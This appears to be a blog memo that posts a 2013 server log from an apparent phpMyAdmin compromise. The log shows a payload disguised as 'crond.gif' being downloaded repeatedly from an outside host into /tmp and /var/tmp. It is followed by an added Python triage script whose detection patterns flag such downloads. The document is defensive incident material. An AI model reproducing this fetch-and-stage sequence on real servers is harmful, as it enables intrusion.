March 26, 2016
This is an old post that was never published, so I am putting it up as a memo.

I believe the log below is probably from an attack that exploited a phpMyAdmin vulnerability.
* This happened a while ago, so I do not remember the details well...


no crontab for apache
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove directory `/tmp/.ICE-unix': Operation not permitted
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
--2013-01-07 20:14:20-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `crond.gif'

0K .......... ..... 100% 23.0K=0.7s

2013-01-07 20:14:22 (23.0 KB/s) - `crond.gif' saved [15620/15620]

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
^M 0 15620 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0^M100 15620 100 15620 0 0 11675 0 0:00:01 0:00:01 --:--:-- 23348
sh: fetch: command not found
sh: lynx: command not found
--2013-01-07 20:14:25-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `/tmp/but.gif'

0K .......... ..... 100% 22.9K=0.7s

2013-01-07 20:14:26 (22.9 KB/s) - `/tmp/but.gif' saved [15620/15620]

--2013-01-07 20:14:26-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `crond.gif'

0K .......... ..... 100% 22.7K=0.7s

2013-01-07 20:14:28 (22.7 KB/s) - `crond.gif' saved [15620/15620]

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
^M 8 15620 8 1448 0 0 2133 0 0:00:07 --:--:-- 0:00:07 2133^M100 15620 100 15620 0 0 11550 0 0:00:01 0:00:01 --:--:-- 21057
sh: lynx: command not found
--2013-01-07 20:14:31-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `/var/tmp/crond.gif'

0K .......... ..... 100% 22.6K=0.7s

2013-01-07 20:14:32 (22.6 KB/s) - `/var/tmp/crond.gif' saved [15620/15620]
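
As an added example (not part of the original post), here is a small Python triage script that scans a log for the kinds of shell-tool output seen above: a crontab query, failed `rm` calls, missing downloader commands, and `wget` saving files under `/tmp` or `/var/tmp`. The rule names, the `scan` and `assess` functions and the sample lines are this example's own constructions, and the hostname in the sample is a placeholder.

```python
import re
from collections import defaultdict

# Detection patterns are this example's own choices, modeled on the log above.
RULES = {
    "crontab_probe": re.compile(r"^no crontab for (\S+)"),
    "missing_tool": re.compile(r"^sh: (\S+): command not found"),
    "wget_request": re.compile(r"^--\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}--\s+(https?://\S+)"),
    "saved_to_tmp": re.compile(r"^Saving to: [`'](/(?:var/)?tmp/[^']+)'"),
    "rm_failure": re.compile(r"^rm: cannot remove (.+)"),
}

def scan(lines):
    """Return {rule_name: [(line_number, captured_value), ...]}."""
    hits = defaultdict(list)
    for number, line in enumerate(lines, start=1):
        text = line.strip()
        for name, pattern in RULES.items():
            match = pattern.match(text)
            if match:
                hits[name].append((number, match.group(1)))
    return dict(hits)

def assess(hits):
    """Summarize hits; flag when a temp-dir download coincides with other shell noise."""
    urls = sorted({value for _, value in hits.get("wget_request", [])})
    paths = sorted({value for _, value in hits.get("saved_to_tmp", [])})
    other = [n for n in ("crontab_probe", "missing_tool", "rm_failure") if n in hits]
    return {"urls": urls, "tmp_paths": paths, "suspicious": bool(paths) and bool(other)}

# Constructed sample input (hostname is a placeholder, not taken from the log).
SAMPLE = """\
no crontab for apache
rm: cannot remove `.' or `..'
--2013-01-07 20:14:25--  http://files.example.invalid/crond.gif
Saving to: `/tmp/but.gif'
sh: lynx: command not found
--2013-01-07 20:14:31--  http://files.example.invalid/crond.gif
Saving to: `/var/tmp/crond.gif'
[Mon Jan 07 20:15:00 2013] [error] File does not exist: /var/www/html/favicon.ico
""".splitlines()

if __name__ == "__main__":
    print(assess(scan(SAMPLE)))
```

A download into the current directory alone does not set `suspicious`; the flag requires a save under a temp directory together with at least one of the other rule categories.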


Posted by stock_value at 13:15 | Category: Technology: 2012